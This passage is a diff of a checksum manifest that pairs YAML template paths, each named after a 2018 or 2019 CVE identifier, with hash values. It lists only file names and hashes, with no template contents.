-http/cves/2019/CVE-2019-17506.yaml:b5e726a64527b6f97ee1d0ba0767b00b72de02b7 -http/cves/2019/CVE-2019-17538.yaml:a225fbb1be9c22ed5bbdfdc77157b20856f30980 -http/cves/2019/CVE-2019-17558.yaml:e7db8bc8d29c5b3401a388c813cf91dfd79d6fd3 -http/cves/2019/CVE-2019-17574.yaml:8d134e7332d970e8da139d0adf4efa4c52ad0f74 -http/cves/2019/CVE-2019-17662.yaml:7805bd25d8cc8c2f4fda4550cbb635a3328a8098 -http/cves/2019/CVE-2019-1821.yaml:d84210cfe405eafaf312234a8374cf92d1785cc3 -http/cves/2019/CVE-2019-18371.yaml:ef6ddca7382b329613b1393be9707f61faaa1e0f -http/cves/2019/CVE-2019-18393.yaml:805b38a6cb727d8bb0f699baadd36aeeb6507dab -http/cves/2019/CVE-2019-18394.yaml:e022b231e055dcbe53ddf6c1997d97b037266e74 -http/cves/2019/CVE-2019-18665.yaml:59996b700c33eef26b014c3fa8a26ef631f9a863 -http/cves/2019/CVE-2019-18818.yaml:656241a9ea843f27c9b50759a5ffe152a5a04e08 -http/cves/2019/CVE-2019-18922.yaml:bd1584c268298cb261afa9edf627cb5b9f32cdf9 -http/cves/2019/CVE-2019-18957.yaml:f6f07b7878e2e9d512b0c54aa02895a01a786ce7 -http/cves/2019/CVE-2019-1898.yaml:2e709641856b01bb4d6fd868b967ba0279adc3ca -http/cves/2019/CVE-2019-19134.yaml:1fb48d557ab2e96e16b841ac6cfd08bb05bc9e23 -http/cves/2019/CVE-2019-19368.yaml:2edda5822eee411ed04cb0b605ddacd0cc2651b3 -http/cves/2019/CVE-2019-1943.yaml:9743eb66ba8cc4fc2459fe033b9cba9fbe20f26b -http/cves/2019/CVE-2019-19781.yaml:828d87f7b26d952ee11b7a42802926b52be5adf3 -http/cves/2019/CVE-2019-19824.yaml:c88231de0d2cf8f7c6a4c1e8b7ce284914eeff2d -http/cves/2019/CVE-2019-19908.yaml:4701a849ab2fb4c76acf636cb3abb5f54e311bea -http/cves/2019/CVE-2019-19985.yaml:09363e1fbccd70a3ce51d4805158a360470a79d1 -http/cves/2019/CVE-2019-20085.yaml:a7166ae067e68cd5f005f72471766d424185c56f -http/cves/2019/CVE-2019-20141.yaml:2a80d24f0dbe760d5329f4995b111311cf9395d0 -http/cves/2019/CVE-2019-20183.yaml:22e39632ef48a86982b35bf6b512bca689659f34 -http/cves/2019/CVE-2019-20210.yaml:86a8e74360215769f1e0ba178fe051e6b3ad97db -http/cves/2019/CVE-2019-20224.yaml:62d91d710fa26d28d7e7f505ba1ec2a745deeb17 -http/cves/2019/CVE-2019-20933.yaml:d7a6863663beba8ee8cd0b9f2293377e13488cd0 -http/cves/2019/CVE-2019-2578.yaml:2d689e20fa2f3bb89490a9311ea66421b1049e45 -http/cves/2019/CVE-2019-2579.yaml:cda4360a45e392805497d50dad644d8cde806de1 -http/cves/2019/CVE-2019-2588.yaml:47a5f29be6496b62e3e27695c88cac434cf6829f -http/cves/2019/CVE-2019-2616.yaml:33e8c297791a6fdcdc758ed0aa87540bb99742cc -http/cves/2019/CVE-2019-2725.yaml:32efe539822ba5e4a8164a417f0fd530c99102eb -http/cves/2019/CVE-2019-2729.yaml:0b8709f2b63cf0b049f90c4c2c4a0cd9e15edc36 -http/cves/2019/CVE-2019-2767.yaml:26078e0e5b0cc78cf8351c679586b5a3a6e4e17b -http/cves/2019/CVE-2019-3396.yaml:2f05fe27531448dc3a1a575ca68ce347300c9e36 -http/cves/2019/CVE-2019-3398.yaml:bbbbe0c9208b481fd31aee6ff20e38fff5ee8301 -http/cves/2019/CVE-2019-3401.yaml:53b99bbdaa9507091ed1eaa59a994389ffb41816 -http/cves/2019/CVE-2019-3402.yaml:d551ee7652e5d590f4dbbf67640ea1d32711c83d -http/cves/2019/CVE-2019-3403.yaml:5eb9aa8a7824e2ee2db9637b13dd21ab34ea7b6a -http/cves/2019/CVE-2019-3799.yaml:00ac9caa7cb2593dd1c8777b6b3b82e35a952908 -http/cves/2019/CVE-2019-3911.yaml:d211f6c5825ae6d96311cbbd2db8caeb615a6da6 -http/cves/2019/CVE-2019-3912.yaml:a8f70b4dcf7698b46a33e78e70aaa27abe99eb05 -http/cves/2019/CVE-2019-3929.yaml:25ee4edaac176c5003cee8eda9c48efa90a3725d -http/cves/2019/CVE-2019-5127.yaml:3c7354774089d9cafad89d9c6b78d25975835849 -http/cves/2019/CVE-2019-5418.yaml:0fc927c56bfe08c1e6a3f32d59200ab11e311b2d -http/cves/2019/CVE-2019-5434.yaml:ccb595bace24ffca2af08af107d7bc7fe79a98bf -http/cves/2019/CVE-2019-6112.yaml:aa4136643e37e2ec57041a4a5cc9415b3fd65aaa -http/cves/2019/CVE-2019-6340.yaml:ed1a02bf0e73e6fbc08dea0119c5f930471971ce -http/cves/2019/CVE-2019-6715.yaml:45c1640d8469a8a749fedd7c93bbeac7490a5e82 -http/cves/2019/CVE-2019-6799.yaml:b2a7f1f19ef09e8506ffd3d5e377567f90600df0 -http/cves/2019/CVE-2019-6802.yaml:aa0d76039643cab8e2c3213a78622315329ceb2f -http/cves/2019/CVE-2019-7192.yaml:4ec47a65ae6fc5c99b059966f308dc0cd1750026 -http/cves/2019/CVE-2019-7219.yaml:a2da9306401358762f754694717c693139dfb634 -http/cves/2019/CVE-2019-7238.yaml:52b2d6267b7735c92d24cdd393a794f6f2fe2734 -http/cves/2019/CVE-2019-7254.yaml:8c808a17af2bdd5d1805b289214942d19b500eeb -http/cves/2019/CVE-2019-7255.yaml:151aca31e86925d01dba08657985ee67174e9dce -http/cves/2019/CVE-2019-7256.yaml:0ea07cab8ae7821fb67d01cb2f90dda7852989d8 -http/cves/2019/CVE-2019-7275.yaml:8487933a6e87def033f77276bf08449122ec45e1 -http/cves/2019/CVE-2019-7315.yaml:e6304cb82ac5317a9f0ff4e5fe86eb9b344c22a7 -http/cves/2019/CVE-2019-7481.yaml:bc21a943db6303523865046d3e2576e12ff3e5a4 -http/cves/2019/CVE-2019-7543.yaml:24d9974c31ff5e7193c0a8eb6604dbd40186f8ed -http/cves/2019/CVE-2019-7609.yaml:a245bb83679373186a7921a8c3d316d30abe4155 -http/cves/2019/CVE-2019-8086.yaml:603e49a7ed31326c841ef071df1b1b82ef7bb146 -http/cves/2019/CVE-2019-8390.yaml:7dd48f540d0675d34f1a607b6d38fd9120a4ac37 -http/cves/2019/CVE-2019-8442.yaml:f7199b2acd23c8ece844ece352639cf346052458 -http/cves/2019/CVE-2019-8446.yaml:dab57e61953fbbde379ac2639578e5828e20d686 -http/cves/2019/CVE-2019-8449.yaml:8972d40f541ea03024d6f451cf12fd6f01666701 -http/cves/2019/CVE-2019-8451.yaml:e3366cd93de7524874511a5ae5cd4dfad460f6c7 -http/cves/2019/CVE-2019-8903.yaml:9c63d61beedf67355c44d2dc057e44ab8b07f444 -http/cves/2019/CVE-2019-8937.yaml:be71baf9da9263ac2d49422d17a5ffd9b32cf481 -http/cves/2019/CVE-2019-8982.yaml:1b8c1e4f212e294f58822794f4c7421202cff8af -http/cves/2019/CVE-2019-9041.yaml:b4fd4a9b5811449f5de5949915d9069c04a7d7a8 -http/cves/2019/CVE-2019-9618.yaml:c32939573457a9485bfeb4d0a2a714c5dbf97814 -http/cves/2019/CVE-2019-9670.yaml:c9a2add593ac17ef6ffca9ed3d2e739e5c4dbb1c -http/cves/2019/CVE-2019-9726.yaml:1b6e69aa96081bb12d6312eb4b7aaf9d6b4daf99 -http/cves/2019/CVE-2019-9733.yaml:1653278ce119b5fe4986c0336a771e19050cc60c -http/cves/2019/CVE-2019-9915.yaml:b6e5feb7b0f2491838bae1d10607974b5ff537e9 -http/cves/2019/CVE-2019-9922.yaml:200fab47e8305f9493218ac094ed2c0c115c55ed -http/cves/2019/CVE-2019-9955.yaml:fb0832b1b18f1930d9d347d5e22f3ccdd9ae5117 -http/cves/2019/CVE-2019-9978.yaml:29fa05916d940a02b2052750609450962d826369 -http/cves/2020/CVE-2020-0618.yaml:fb8a86443513fb8dfb8bfd4ef48846be61fbd046 -http/cves/2020/CVE-2020-10148.yaml:785c887c894285e141a8c3ec6d81dbf0ca321825 -http/cves/2020/CVE-2020-10199.yaml:148ba582f0b0a858b2974d29715f40352211ead0 +http/cves/2018/CVE-2018-17246.yaml:d955be6d54349854227318d931a718abe45ed467 +http/cves/2018/CVE-2018-17254.yaml:e6cdd19ac7b4ffd6a878dd468afa1ba78cfb2df8 +http/cves/2018/CVE-2018-17422.yaml:52ba1af80e2a3702abaa2ed58b9342095bc5b910 +http/cves/2018/CVE-2018-17431.yaml:4a01420de80ad273ae14770d6bd1d0132f95e008 +http/cves/2018/CVE-2018-18069.yaml:09340f80af14c3f8302a50abfb9af172b962030e +http/cves/2018/CVE-2018-18264.yaml:49c65d6227ebd7071fcaddcd7724794c7e78fa64 +http/cves/2018/CVE-2018-18323.yaml:ac14aa972a78fa6f4940ed75ebf096ea76b3de84 +http/cves/2018/CVE-2018-18570.yaml:1facca4d6ecf83720127bad89c97c9c92f692120 +http/cves/2018/CVE-2018-18608.yaml:a43826a2c67c86fef6e41e62fe103f1ec444b03b +http/cves/2018/CVE-2018-18775.yaml:ed918d6dcba496a595d78714c38c0ac9cc80ddd5 +http/cves/2018/CVE-2018-18777.yaml:7d9ab1681824ea4c53e6e4b0723a2da0bc1f2e58 +http/cves/2018/CVE-2018-18778.yaml:d37d3a10fd7ba59318e5e05c814d78db62642c50 +http/cves/2018/CVE-2018-18809.yaml:7c30cc9b68b112a888500d588095b56634ed9cb9 +http/cves/2018/CVE-2018-18925.yaml:4e8ee8966de6e6e9d0fe0c814271d577cb157223 +http/cves/2018/CVE-2018-19136.yaml:e75cdbfcca0f5ae2a000a1fa0080d775d2262fd3 +http/cves/2018/CVE-2018-19137.yaml:5b100af5704dafd4e03d7fb65ba9b3f4ec50c306 +http/cves/2018/CVE-2018-19287.yaml:b93f6ec2234afcbb05c599db5b196e50977bb705 +http/cves/2018/CVE-2018-19326.yaml:f831e594bea7ccaa46a0ebde5a12d48a6938c3b6 +http/cves/2018/CVE-2018-19365.yaml:6accb98b8650fb627be9fb9cbfad773b80eee4b1 +http/cves/2018/CVE-2018-19386.yaml:e56dd8dae85a2c40dd5d45854b3b80d69a4a211c +http/cves/2018/CVE-2018-19439.yaml:e385fa4321448ac876f269f6c6014d305c06e7e1 +http/cves/2018/CVE-2018-19458.yaml:cc24560a3157616a99d70b330413f4300d79eebd +http/cves/2018/CVE-2018-19749.yaml:c6d89ddb03a4ac1a78d648c493f58263bd9388f0 +http/cves/2018/CVE-2018-19751.yaml:83dc60b2b853392945d30d6685465afdf9ab81ee +http/cves/2018/CVE-2018-19752.yaml:6cf5dd9aaa321b87ac8f71742836cf8e52919a31 +http/cves/2018/CVE-2018-19753.yaml:662cb56a05b770ab6a1bf7e5e7240baef3a09572 +http/cves/2018/CVE-2018-19877.yaml:818bf7851b65f8206f75dfedb4178727dfeb9dd2 +http/cves/2018/CVE-2018-19892.yaml:7a77a940c75e9688c95fde27591b2cae369df74f +http/cves/2018/CVE-2018-19914.yaml:02f07e98f5b3ba1511e38f254495533299485e59 +http/cves/2018/CVE-2018-19915.yaml:3331c71394b4a37cf8e53472a477f1c573957a38 +http/cves/2018/CVE-2018-20009.yaml:caa8acc5cbe2ba6d748110dccbf67e221653ad03 +http/cves/2018/CVE-2018-20010.yaml:79f89a63fca5e796f5d2a2ed6b1f523b2f255a14 +http/cves/2018/CVE-2018-20011.yaml:96153c92750fbf6fda468d4adfc70f1c2e788fdb +http/cves/2018/CVE-2018-20462.yaml:e2702678367f227ac05c0faf3430e900ff555da3 +http/cves/2018/CVE-2018-20463.yaml:9d6b4cce843cc3e437856dc7565c2112ee149303 +http/cves/2018/CVE-2018-20470.yaml:a1d0746f936a86f356de213bd34148b652ce886d +http/cves/2018/CVE-2018-20526.yaml:10f2bd5f8946e3831edcc9f07cdf7b0299ccbe65 +http/cves/2018/CVE-2018-20608.yaml:31e3eb3f44e710c001bb77cf6b41ab63f3000e65 +http/cves/2018/CVE-2018-20824.yaml:f969f397573aef2485c85d66bf538a7c90a80ef4 +http/cves/2018/CVE-2018-20985.yaml:ab91fb122bd3813d4d61c8e9cdb33a03d2bea75e +http/cves/2018/CVE-2018-2392.yaml:7843d74a7adaa279ab15fe4fef7badd4bde9e8c8 +http/cves/2018/CVE-2018-2791.yaml:5d4ca759f8e353f71b15f5ce42c14ad831a75217 +http/cves/2018/CVE-2018-2894.yaml:9d9ae28e1742ccdff94a5a1b88dd73a8b5156ae6 +http/cves/2018/CVE-2018-3167.yaml:e8cdbe8a8fc433ed64dd36bcdd00c8153bc5b71e +http/cves/2018/CVE-2018-3238.yaml:304ff64ec2a4d67071f0335c2e8956c8d833fa5a +http/cves/2018/CVE-2018-3714.yaml:8fd90da83ebba2d8bef27a0199a32f6ca35d043d +http/cves/2018/CVE-2018-3760.yaml:8dc19c7c137333ce1488e104c5fb8af9bf59490c +http/cves/2018/CVE-2018-3810.yaml:5d937eaa9404646e4ccde908fe4a0b9d4ddb672a +http/cves/2018/CVE-2018-5230.yaml:44324213671e8baa31a034808587b36c5376ae6a +http/cves/2018/CVE-2018-5233.yaml:da18cd3e424ddefcec6ed8e006481358a040c1fc +http/cves/2018/CVE-2018-5316.yaml:c98fb8b80335480ded8e8f6f72602cb5b57723d3 +http/cves/2018/CVE-2018-5715.yaml:07a9ce06f91be2127e16106bc291d6ca8a7a9ff5 +http/cves/2018/CVE-2018-6008.yaml:ef3b0235982c72a51f538e339f0438466a92235f +http/cves/2018/CVE-2018-6184.yaml:d05c7df179e4a6baa929f1ad3755b33e611e7403 +http/cves/2018/CVE-2018-6200.yaml:82a383e97297b1608358ca5b6a8dab0685f84bd8 +http/cves/2018/CVE-2018-6530.yaml:b14a2fff4b0cafde0e7190292343d63663a33fab +http/cves/2018/CVE-2018-6910.yaml:f7acba4781bdcf6b7dad66a0a52c02d7ea560162 +http/cves/2018/CVE-2018-7251.yaml:8f47f9381c725928706f7b484916d0c7ec95cb7e +http/cves/2018/CVE-2018-7422.yaml:ff4e477ff80e9221f970782dcfc93f0c97343bca +http/cves/2018/CVE-2018-7467.yaml:eb629ea7f5137400319dc0f7b417387e5c7482b4 +http/cves/2018/CVE-2018-7490.yaml:41eb335a51029c3cf671f324c7bc2f1a3c343d71 +http/cves/2018/CVE-2018-7600.yaml:f5ad649f2ddbf8148b5b5aa42685674da353a478 +http/cves/2018/CVE-2018-7602.yaml:b597b04c8d622f13eaebfabed71f0251af493809 +http/cves/2018/CVE-2018-7653.yaml:7e50cb9e229730ad91f097129d33ed8ed01857a1 +http/cves/2018/CVE-2018-7662.yaml:35c3fc1bf35b6b7d06cfadb10980e78a69f7b9a3 +http/cves/2018/CVE-2018-7700.yaml:545cf5f180ab1521fa2099a2b8070fc0e7cfd589 +http/cves/2018/CVE-2018-7719.yaml:24b8824dc83fe53074ff37d4d701dbb37fa8fa8a +http/cves/2018/CVE-2018-8006.yaml:177090eae649f97b8542cdd31283d5bb9c159daf +http/cves/2018/CVE-2018-8033.yaml:47b4553a7e9a3299a274a2c9d886f7f48bbb34bf +http/cves/2018/CVE-2018-8715.yaml:c060e110534181e713e4929f18a5372aab6de204 +http/cves/2018/CVE-2018-8719.yaml:69991b72cd92b3bcf3fc41456d4b8a8430044ed1 +http/cves/2018/CVE-2018-8727.yaml:d77bc3899ccb7e4180c0570612f49c0306e77cac +http/cves/2018/CVE-2018-8770.yaml:60e87cd61d39c08de32877a3bd3eea3efd201d82 +http/cves/2018/CVE-2018-9118.yaml:5a3ec3d29d1e2155e4c1c8e57ae183fdba239bd6 +http/cves/2018/CVE-2018-9161.yaml:cac8cbda295e8b33fabdee0e6012fd10af943c94 +http/cves/2018/CVE-2018-9205.yaml:88e7f9e1b4b143736af6e06e6bd0d5d7e329c1ea +http/cves/2018/CVE-2018-9845.yaml:625a726a679a8c47c1f041908720da694347ddd3 +http/cves/2018/CVE-2018-9995.yaml:595c0f1f58073444608d96aab75a2c3273c832f0 +http/cves/2019/CVE-2019-0193.yaml:bdd7020875f2534cc54cbf05fad0506d201d5417 +http/cves/2019/CVE-2019-0221.yaml:9892d1794c813e0b65b8ea300ad030e035f34afb +http/cves/2019/CVE-2019-0230.yaml:fb813d846646372f831d22ef14c127bb366d6f1b +http/cves/2019/CVE-2019-10068.yaml:df48b4fbe3f1d7d1964c8748c946dd39f3fb18df +http/cves/2019/CVE-2019-10092.yaml:47c8cf9c84f55150405be3eeb85c04735c2f689b +http/cves/2019/CVE-2019-10098.yaml:03c48a816abcb2bd95cb82833b96203f5b749045 +http/cves/2019/CVE-2019-1010287.yaml:ee0d16aa0e682261a4fab71f7a9db6cb63432cee +http/cves/2019/CVE-2019-1010290.yaml:de37c24f872bac7f162a759b7070dd36bef8921c +http/cves/2019/CVE-2019-10232.yaml:583f7625a2225f16fdfa808e08cce94aace549b1 +http/cves/2019/CVE-2019-10405.yaml:fb207522d7ce92ed741fb12820f34870e0a9dca7 +http/cves/2019/CVE-2019-10475.yaml:ac4ac26a966afa7f749a36abfcd9b382809d2b6c +http/cves/2019/CVE-2019-10692.yaml:25f77807fa261cac2c6042cf881c286bb8b92a66 +http/cves/2019/CVE-2019-10717.yaml:8207ae4d46379e3b54693ebbaa2d844e2771d276 +http/cves/2019/CVE-2019-10758.yaml:d50b172e0ddded831a7c82d63cead3a2bea5503e +http/cves/2019/CVE-2019-11013.yaml:7366a212d9a1754e91010ff5f85c343059edc9d7 +http/cves/2019/CVE-2019-11248.yaml:17b65cc75baa9db48c8890da4d0d6b26ea0a303e +http/cves/2019/CVE-2019-11370.yaml:1595e81fe1302238e581ff5a0344f98bc447a90d +http/cves/2019/CVE-2019-11510.yaml:e40506f727b6461d1f669bc6a516fc6008eeff20 +http/cves/2019/CVE-2019-11580.yaml:de5dc28e9140c88a4a13e3cb4af115655375e614 +http/cves/2019/CVE-2019-11581.yaml:d3dff6113063409b50a4d1dafc6509e1d54491bc +http/cves/2019/CVE-2019-11869.yaml:f817212310482f8e070391f63701c3fde5cc5ef3 +http/cves/2019/CVE-2019-12276.yaml:27f893f7a856e8a4a18ad436113c1c97fb398db6 +http/cves/2019/CVE-2019-12314.yaml:0099565ef982560f6b9e7586810cd921c85db3b2 +http/cves/2019/CVE-2019-12461.yaml:b5e2478f0a2be49ade9c408f0baa2758f9d3e510 +http/cves/2019/CVE-2019-12581.yaml:66d80a98eec1301f060eb95851b2aea98877a817 +http/cves/2019/CVE-2019-12583.yaml:f3bc9e07a0b11be50e42d3a4027f914b0b190560 +http/cves/2019/CVE-2019-12593.yaml:e7eacdfcebd3448a295248f4dd664b6c65025594 +http/cves/2019/CVE-2019-12616.yaml:c5ee3879fbc8c2ecb4f291744b61a812181157ff +http/cves/2019/CVE-2019-12725.yaml:b0dab9fedf14c989116c6dbc19b1070fda98f69c +http/cves/2019/CVE-2019-12962.yaml:c9c29a61d8f667c117f9936106a98e0d7687b602 +http/cves/2019/CVE-2019-12985.yaml:7a1442fdc5df63a6c6ec075677d30d0475b7be05 +http/cves/2019/CVE-2019-12986.yaml:8b796581180f6dc9a9f93e3c5c406bdaac4bb75a +http/cves/2019/CVE-2019-12987.yaml:be2e716ad6d96d0ad6a70de64587c508082daf95 +http/cves/2019/CVE-2019-12988.yaml:17b6b229e80ba09ba192d2955cbd760b95bdc434 +http/cves/2019/CVE-2019-12990.yaml:a9e017ee3b6dd00043a8c87de85b051e4d57121c +http/cves/2019/CVE-2019-13101.yaml:605fc575cc61a9af3f8d41ad1ffb119ccca7eb5a +http/cves/2019/CVE-2019-13392.yaml:41809bacedc52f6d989a66aa1a2291e11c6d2de0 +http/cves/2019/CVE-2019-13396.yaml:53f9ac256f8634234deb5ddbc87c3e21369204df +http/cves/2019/CVE-2019-13462.yaml:a27119733cfc6a56487b1981f2a301a20c3c1daf +http/cves/2019/CVE-2019-14205.yaml:724650ac9f61b4b569ecc43e01dfd413706392eb +http/cves/2019/CVE-2019-14223.yaml:13e482ad2c8c67f64e0d0191c3ed9ccb2d6dd0b3 +http/cves/2019/CVE-2019-14251.yaml:5a7c55ffd72242316f4e23510c6149ed7bcc49d8 +http/cves/2019/CVE-2019-14312.yaml:69cf9d348b788a1273f3886a02b899fad7593129 +http/cves/2019/CVE-2019-14322.yaml:6bf48685f1d22abcad5d83300ef8733f4b6abd79 +http/cves/2019/CVE-2019-14470.yaml:124de5d2583d8918ad72484f53b876c7b9ff1cb1 +http/cves/2019/CVE-2019-14530.yaml:1d42b890613650b412b577c26bac8f1f39c013a1 +http/cves/2019/CVE-2019-14696.yaml:2b634782e60548c905a3d8ea36d3d2d50db8e489 +http/cves/2019/CVE-2019-14750.yaml:5f960226018c61d39a29ff172fa5e099bd67b8e0 +http/cves/2019/CVE-2019-14789.yaml:a23a97b9f793063529c5e81ecef45f9565f994f3 +http/cves/2019/CVE-2019-14974.yaml:86fcf54559b1773a51611f6b6920a0c348b83b46 +http/cves/2019/CVE-2019-15043.yaml:493d5324e4b85a5d8ec19809b2ccd754559bf6fb +http/cves/2019/CVE-2019-15107.yaml:b3199503dbeed98c1f9b965679753f68918a86de +http/cves/2019/CVE-2019-15501.yaml:045a5c0b79162309ef51ca7fa662b2263aceab76 +http/cves/2019/CVE-2019-15642.yaml:6665db40b0a2e3d837ef0c09bbd3095cdfff5aea +http/cves/2019/CVE-2019-15713.yaml:42feab6aa07cad0b58db902d6193d625d740fdd4 +http/cves/2019/CVE-2019-15811.yaml:3995ef0073ee795862868a08f985d5ebbf97e40a +http/cves/2019/CVE-2019-15858.yaml:1bc7c733bd1160a1e72aff73718147bc1a9444fb +http/cves/2019/CVE-2019-15859.yaml:3f4a81780513155a77b07667007b287fdcca8c0c +http/cves/2019/CVE-2019-15889.yaml:be3f1a0481473955dd94c78647bd139e35456c51 +http/cves/2019/CVE-2019-16057.yaml:40f6ae09369ff7c2a8e8cd45321cb91ca1d554b3 +http/cves/2019/CVE-2019-16097.yaml:e5de9cacac9bb877473e2b9190f1c34d028eaacb +http/cves/2019/CVE-2019-16123.yaml:72c8040226ee8ad83270d80b1684bf0094a329ac +http/cves/2019/CVE-2019-16278.yaml:20a792baf38dc2feefa2f8196aa35848c3b24b67 +http/cves/2019/CVE-2019-16313.yaml:b872dbddb08b5dc50d686b0ca511c879682c17a8 +http/cves/2019/CVE-2019-16332.yaml:06ef4a304939a22609ac294d66c5bf7f6ccd79e4 +http/cves/2019/CVE-2019-16525.yaml:509c4ac67ba3ee99c55fa37dda08f3713652dc05 +http/cves/2019/CVE-2019-1653.yaml:150ae32e0b8be9b98b391ca2a0e12d9e0f67c12e +http/cves/2019/CVE-2019-16662.yaml:823a90f18963e2019a4950f1f2fb51671b87bfde +http/cves/2019/CVE-2019-16759.yaml:5470b0309cd88a38e05159b2f0a9ed546c9da23d +http/cves/2019/CVE-2019-16920.yaml:a0d1bf9da72ba7147594e9e74704358e8bbe94f4 +http/cves/2019/CVE-2019-16931.yaml:eac9c2c00b1b5cf2609230eb076a97d52141e9ae +http/cves/2019/CVE-2019-16932.yaml:cbb21f7877dc7205746f13cbc3a4d81048fdc5b7 +http/cves/2019/CVE-2019-16996.yaml:927bb7dfb3eeb583c963a59a7371e9121194219c +http/cves/2019/CVE-2019-16997.yaml:b8244f8546b7ece08f535f6716d2028343235f06 +http/cves/2019/CVE-2019-17270.yaml:9764921d36c52fb01e7a755b284d3b89f60f28fc +http/cves/2019/CVE-2019-17382.yaml:1964e9e8231d0fc86936f2fe167293148ec1da75 +http/cves/2019/CVE-2019-17418.yaml:bc03d6ad26c72cea4dd21359dee99c2be3820b9a +http/cves/2019/CVE-2019-17444.yaml:e8ef723acb2b0e90e1aeb2ed194c35a42c6e4e3d +http/cves/2019/CVE-2019-17503.yaml:da182187ffcd7d17e82e61f1d89453b110160df2 +http/cves/2019/CVE-2019-17506.yaml:6c616e9302978285c2657c49de59296d28e3f6c8 +http/cves/2019/CVE-2019-17538.yaml:f40fe589fb014bd3f245210c1c6107f1ce38c5c3 +http/cves/2019/CVE-2019-17558.yaml:bcd00e85479df46d9064c5c43064bb71bd74c47b +http/cves/2019/CVE-2019-17574.yaml:b7abb430f1a4649ee0e69ed038b1db9bbab29f7d +http/cves/2019/CVE-2019-17662.yaml:7e12f0e06edfea8901c3da05f166458bf35211f0 +http/cves/2019/CVE-2019-1821.yaml:596b768ecc84688eb5ace542d0675e483de685f9 +http/cves/2019/CVE-2019-18371.yaml:73213e9b92ab1dc7e20811c89df41827409f03f1 +http/cves/2019/CVE-2019-18393.yaml:f7a0a6bedb32d116dd692a86c783d1aa1af627ba +http/cves/2019/CVE-2019-18394.yaml:b0e343e331638776b25f1786511a696ab07d893c +http/cves/2019/CVE-2019-18665.yaml:6e0092368746d830b43afc6bc3d8b7019fda900c +http/cves/2019/CVE-2019-18818.yaml:c06314d784ca66fb35024a71b0b8fb3836183111 +http/cves/2019/CVE-2019-18922.yaml:a52c6e510f1eb7a5dd908ab353bd6b3a458143f6 +http/cves/2019/CVE-2019-18957.yaml:9293ea5317dfeaa3187cd14c96db11d6f91cda69 +http/cves/2019/CVE-2019-1898.yaml:bdf566ac59ca7aee29e30a470db6767d580d0f0a +http/cves/2019/CVE-2019-19134.yaml:d724eda9d09ee65372af71ca6fa4152f4edb321c +http/cves/2019/CVE-2019-19368.yaml:64f175189cb26bf4cb2d99aa6a4719efce9ca294 +http/cves/2019/CVE-2019-1943.yaml:3a04f0b5f26ee3a0f489c62ceed6f9238cdfd6cf +http/cves/2019/CVE-2019-19781.yaml:5c3bba7cacb1ef642d1325c259760e2e757c39ee +http/cves/2019/CVE-2019-19824.yaml:cd804f5f04cb2537837adc965a9b4792652b8462 +http/cves/2019/CVE-2019-19908.yaml:c68067562c2662157e87172f4d20ddd2c8ca4d85 +http/cves/2019/CVE-2019-19985.yaml:2ae8a50cfb2029b002760745b95add22689b7e98 +http/cves/2019/CVE-2019-20085.yaml:835d411cff3720d32f57ed29223e9986678de041 +http/cves/2019/CVE-2019-20141.yaml:fb41ecf88cd78d4449f8ae129ca8f965b68da75e +http/cves/2019/CVE-2019-20183.yaml:87ee3fc26256ae200eefd46f8294afe40135db48 +http/cves/2019/CVE-2019-20210.yaml:5dc29136575d12bf698066f767198af46daac61e +http/cves/2019/CVE-2019-20224.yaml:6e3e38499c47bee9ceb75c00b4c14d5aa7bf906b +http/cves/2019/CVE-2019-20933.yaml:77a7cd0a770f43977e7d28444893b218017db550 +http/cves/2019/CVE-2019-2578.yaml:7a0917a1b036d8f13e85e155d0efde94a957fe4a +http/cves/2019/CVE-2019-2579.yaml:d9a5cb29714cb148919a56e8fd1e451dbcc98ef3 +http/cves/2019/CVE-2019-2588.yaml:f9b9f79b2332b94f0558a4edd1cdc5e8dec032d8 +http/cves/2019/CVE-2019-2616.yaml:fdd8f9f4cdc93a7181b4573305846de753542b4b +http/cves/2019/CVE-2019-2725.yaml:bc19fd7004d821edb684bc1b263765b5340c09b5 +http/cves/2019/CVE-2019-2729.yaml:130b1edbd12d2a624d5efb49bae906871f09bac2 +http/cves/2019/CVE-2019-2767.yaml:2b157a3be04ed461fd977920d93a7c5089a82bfa +http/cves/2019/CVE-2019-3396.yaml:58365c6732be8bf19188afd0274dd824b21ae565 +http/cves/2019/CVE-2019-3398.yaml:49e8f9786b6c0c0c9cb4a6dec68e6e986dbbf21d +http/cves/2019/CVE-2019-3401.yaml:fa26d39bc617980dd717ff8b8e87bb7165572fd1 +http/cves/2019/CVE-2019-3402.yaml:ceedd40c6947534bce1aca68808c879b426da902 +http/cves/2019/CVE-2019-3403.yaml:49ad9981cb2fcdd5497e0a12404869e09644cc92 +http/cves/2019/CVE-2019-3799.yaml:a7f65ec87a3633e9f3b6bb6671db1dd103536e39 +http/cves/2019/CVE-2019-3911.yaml:f89542046ded30793ed7fe46aa839e9e1d6ab79e +http/cves/2019/CVE-2019-3912.yaml:94799d73e7dee6145c94b4e9a67e5210e1b8930e +http/cves/2019/CVE-2019-3929.yaml:62a56d3ad1b44d5a4dfdfa14eb5357dce1a524ee +http/cves/2019/CVE-2019-5127.yaml:983e90c29d2ad650b38a404c2504df2cc0b52ea8 +http/cves/2019/CVE-2019-5418.yaml:0a26ee3ec5342ed717ce590832124b064d9c3fad +http/cves/2019/CVE-2019-5434.yaml:88f10696e1d71e89bcc265351ae9007bc6da434d +http/cves/2019/CVE-2019-6112.yaml:96865686f80b685912e8599885c75230f9c2a4b2 +http/cves/2019/CVE-2019-6340.yaml:eb0516c10b4c8966f779929ac85b960ce217d294 +http/cves/2019/CVE-2019-6715.yaml:c981164ee863fe37f70feee7b3bdac9872aa113a +http/cves/2019/CVE-2019-6799.yaml:aefdd4c0f9ccd5b2fb19757e534ad01d892c65de +http/cves/2019/CVE-2019-6802.yaml:c552341cd86965352c720526d3680472f098f76f +http/cves/2019/CVE-2019-7192.yaml:edc227065cb0368a31ffc2e74afc3632df1d1444 +http/cves/2019/CVE-2019-7219.yaml:23601d2a7b76693b463f480e9a7be109bc9cb855 +http/cves/2019/CVE-2019-7238.yaml:4231cd99576c2e6f2d8c31aeefa848660321f94e +http/cves/2019/CVE-2019-7254.yaml:398fbc8e44bb815b120ee959d091cf28d35b6d9d +http/cves/2019/CVE-2019-7255.yaml:5f4b115ca2dcbc82d2dca2ec8a6f8da391d5392e +http/cves/2019/CVE-2019-7256.yaml:58295af0337b00734187d190229be98d7f1d402f +http/cves/2019/CVE-2019-7275.yaml:e8259d7559543a28486efca73f62b22e77a6ac3b +http/cves/2019/CVE-2019-7315.yaml:572f93024428eedc5a45675c9a612af72a84f2d5 +http/cves/2019/CVE-2019-7481.yaml:53f138226e42452d2c55663533428619276c59bb 